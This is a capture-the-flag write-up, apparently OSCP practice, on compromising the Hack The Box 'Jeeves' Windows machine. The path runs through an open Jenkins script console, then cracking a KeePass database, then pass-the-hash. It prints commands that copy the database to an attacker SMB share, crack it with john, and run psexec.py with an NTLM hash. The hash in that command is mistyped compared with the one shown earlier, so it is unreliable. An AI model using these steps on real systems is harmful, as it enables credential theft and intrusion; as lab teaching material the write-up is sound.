OSCP PREPROTİONS – HTB Jeeves

Jeeves machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of the port scan, 80/tcp http Microsoft IIS httpd 10.0, 135/tcp msrpc Microsoft Windows RPC, 445/tcp microsoft-ds Microsoft Windows 7 – 10 microsoft-ds (workgroup: WORKGROUP), 50000/tcp http Jetty 9.4.z-SNAPSHOT ports are open.
We provide enumeration on port 80.

We looked at the source code in developer mode and with wepanalzyer and we could not get any results.
No matter what we type in the search section, the server keeps giving error 🙂

We did not get any valuable information here, so let’s see if there are hidden files and directories with gobuster

A file directory search did not reveal any valuable information. Let’s go here
Let’s see if http works on port 50000.

Here we have Jetty. (Eclipse Jetty is a Java web server and Java Servlet container. While web servers are usually associated with serving documents to people, Jetty is now often used for machine-to-machine communication within larger software frameworks. )
Here we are doing a file directory scan.

We have detected the /askjeeves directory.
Let’s go here

Here we have logged in to jenkins immediately
Since Jenkins is an automation server on the interface we are providing Enumeration on, it is certain that we will have some kind of direct access to the underlying machine. Going to Manage Jenkins under the top left menu, a scripting console appears.

After clicking

We came across Groovy script and I had no idea about this language.
The part that interests me is that it offers a shell screen that I can access to the machine.

Looking at the first github page

And I use this code and run it

we got shell in user jeeves\kohsuke

We provide local enumeration to get the administrator authorization.
I go to the Documents directory

I came across the .kdbx file where I understand it is keepas database

If I can detect passwords in this database, I can get root flage.
Let’s forward this database to our own machine.
Here we first start smb server on our attacker machine.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py ma .

then copy the CEH.kdbx file from the target machine to the share
copy C:\Users\kohsuke\Documents\CEH.kdbx \10.10.14.19\ma\CEH.kdbx

Then the database comes to our attacker machine

Here we convert the kdbx file to hash value with keepass2john tool
And we’re trying to break it with john
└─# keepass2john CEH.kdbx > hash_db
└─# john –wordlist=/usr/share/wordlists/rockyou.txt hash_db

Here we successfully cracked the master key as “moonshine1”.

We ran the keepassx tool

This is how we accessed the keys

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
hash (we tried other passwords without successful login)
here we try the passthehash attache using the psexec.py tool
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238ff238cbe81fe00 administrator@10.10.10.63 cmd.exe
We obtained shell from user nt authority\system

We noticed that there is no flag in the Desktop folder, let’s look at Alternate Data Streams to make sure there is a flag here.

This is how we got the root flag.